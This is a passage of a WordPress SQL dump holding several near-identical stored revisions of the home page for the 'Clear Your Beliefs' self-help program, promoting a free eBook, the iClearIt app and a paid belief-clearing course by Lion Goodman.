src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:53:00', '2014-10-10 04:53:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1550, 2, '2014-10-20 18:36:43', '2014-10-20 23:36:43', '', 'learn-more', '', 'inherit', 'closed', 'open', '', 'learn-more', '', '', '2014-10-20 18:36:43', '2014-10-20 23:36:43', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png', 0, 'attachment', 'image/png', 0),
(1543, 2, '2014-10-20 02:37:23', '2014-10-20 07:37:23', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:37:23', '2014-10-20 07:37:23', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1542, 2, '2014-10-20 02:35:46', '2014-10-20 07:35:46', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nThis is box title\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:35:46', '2014-10-20 07:35:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1544, 2, '2014-10-20 02:40:29', '2014-10-20 07:40:29', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nSpecial Program\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:40:29', '2014-10-20 07:40:29', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1545, 2, '2014-10-20 02:41:40', '2014-10-20 07:41:40', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a>\n<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:41:40', '2014-10-20 07:41:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1546, 2, '2014-10-20 02:42:22', '2014-10-20 07:42:22', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:42:22', '2014-10-20 07:42:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1547, 2, '2014-10-20 02:44:10', '2014-10-20 07:44:10', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n\n<p style="text-align: center"><strong>DOWNLOAD THE FREE iClearIt APP</strong>\n\n<p style="text-align: center"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:44:10', '2014-10-20 07:44:10', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
